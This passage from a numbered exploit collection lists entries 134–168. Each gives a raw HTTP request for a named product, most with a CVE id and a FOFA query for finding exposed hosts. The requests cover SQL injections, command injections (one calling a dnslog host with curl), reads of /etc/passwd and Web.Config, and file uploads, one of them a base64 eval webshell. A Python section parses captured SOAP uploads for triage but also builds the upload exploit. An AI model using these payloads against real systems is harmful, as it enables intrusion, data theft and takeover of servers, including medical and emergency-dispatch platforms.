------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 (Netentsec) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 (Netentsec) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is reachable at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue is the base64-encoded file body: a JScript .asmx web service whose Cmdshell method eval()s its Pass parameter. The uploaded file is then called at
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
The encoded slashes (%2F) must reach the server undecoded, so send the request line as-is:
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (here a path-traversal value) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file at http://x.x.x.x/dizxdell.aspx

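In the two SOAP upload POCs above (159 INFINITT WebJobUpload and 161 科拓 Webservice.asmx) the target file name and the base64-encoded file body travel in sibling elements, so a responder holding the captured request can recover exactly what was written and where. The Python below is an added example, not code from the original post or from either vendor; the element names (fileName, bufValue, fileFlow) come from the two POCs, while the helper names and the embedded sample envelope are constructed here.

```python
import base64
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEMPURI = "http://tempuri.org/"          # namespace of the 科拓 UploadResume call (entry 161)
NAME_TAGS = {"fileName"}                 # element carrying the target file name (both POCs)
BODY_TAGS = {"bufValue", "fileFlow"}     # element carrying the base64 file body (159 / 161)
SERVER_SIDE_EXT = (".asmx", ".aspx", ".ashx", ".asp")  # executed by the IIS targets above


def _local(tag):
    """'{ns}fileName' -> 'fileName'; the two POCs use different namespaces."""
    return tag.rsplit("}", 1)[-1]


def parse_soap_upload(body):
    """Triage one captured SOAP body. Returns a dict with the file name, the decoded
    content, whether the name climbs directories and whether the extension is one the
    server would execute; None if no name/body element pair is present."""
    if isinstance(body, str):
        body = body.encode("utf-8")
    name = content = None
    for el in ET.fromstring(body).iter():
        local = _local(el.tag)
        if local in NAME_TAGS:
            name = (el.text or "").strip()
        elif local in BODY_TAGS and el.text:
            content = base64.b64decode(el.text.strip(), validate=True)
    if name is None or content is None:
        return None
    segments = name.replace("\\", "/").split("/")
    return {
        "file_name": name,
        "content": content,
        "traversal": ".." in segments,
        "executable": name.lower().endswith(SERVER_SIDE_EXT),
    }


def build_upload_resume(file_name, content, ip="1", tag="3"):
    """Build the UploadResume envelope of entry 161 with ElementTree, which escapes
    the name correctly and base64-encodes the body as the service expects (step 1 of
    the entry). Returns bytes for a text/xml POST against a lab host."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    op = ET.SubElement(ET.SubElement(env, f"{{{SOAP_NS}}}Body"), f"{{{TEMPURI}}}UploadResume")
    ET.SubElement(op, f"{{{TEMPURI}}}ip").text = ip
    ET.SubElement(op, f"{{{TEMPURI}}}fileName").text = file_name
    ET.SubElement(op, f"{{{TEMPURI}}}fileFlow").text = base64.b64encode(content).decode("ascii")
    ET.SubElement(op, f"{{{TEMPURI}}}tag").text = tag
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


# Constructed sample: the 科拓 request body from entry 161, as a responder would capture it.
SAMPLE_161 = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>"""

if __name__ == "__main__":
    hit = parse_soap_upload(SAMPLE_161)
    print(hit["file_name"], hit["traversal"], hit["executable"], hit["content"])
    # Round trip: a benign name and body survive build -> parse unchanged.
    print(parse_soap_upload(build_upload_resume("report.pdf", b"%PDF-1.4"))["file_name"])
```

The same parser works for the INFINITT body because it only looks at local element names; the "traversal" and "executable" flags are what turns a captured request into a finding (an .aspx written outside the upload directory) without having to visit the target.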
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The file is then served from the remotePath directory: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The stored name (update.aspx) differs from the uploaded one (qaz.aspx); the file is reachable at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
The injection point is the sortOrder parameter (URL as given in the source, with the middle elided):
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Decoded, solutionNo is ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE; the CHAR() sequence spells "hello", so an error response containing that string confirms the injection.

167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

